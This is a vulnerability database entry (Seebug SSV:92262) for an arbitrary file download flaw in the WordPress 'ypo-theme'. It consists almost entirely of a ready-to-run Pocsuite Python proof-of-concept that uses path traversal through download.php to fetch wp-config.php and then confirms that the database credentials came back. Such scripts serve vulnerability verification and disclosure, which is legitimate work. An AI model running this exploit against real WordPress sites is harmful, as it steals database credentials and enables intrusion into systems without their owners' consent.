WordPress theme ypo-theme Arbitrary File Download Vulnerability

2016-08-09T00:00:00
ID SSV:92262
Type seebug
Reporter cdxy
Modified 2016-08-09T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
    vulID = '92262'  # ssvid
    version = '1.0'
    author = ['cdxy']
    vulDate = '2016-08-09'
    createDate = '2016-08-11'
    updateDate = '2016-08-11'
    references = ['https://www.seebug.org/vuldb/ssvid-92262']
    name = 'WordPress theme ypo-theme Arbitrary File Download Vulnerability'
    appPowerLink = 'wordpress.org'
    appName = 'Wordpress'
    appVersion = 'ALL'
    vulType = 'File Download'
    desc = '''
    WordPress theme ypo-theme Arbitrary File Download Vulnerability
    '''
    def _attack(self):
        return self._verify()
    
    def _verify(self):
        payload = "/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.php"
        res = req.get(self.url.rstrip('/') + payload)
        return self.parse_verify(res)
    
    def parse_verify(self, res):
        output = Output(self)
        result = {}
        if "define('DB_NAME'" in res.content and "@package WordPress" in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            output.success(result)
        else:
            output.fail('No vulnerability found.')
        return output
register(TestPOC)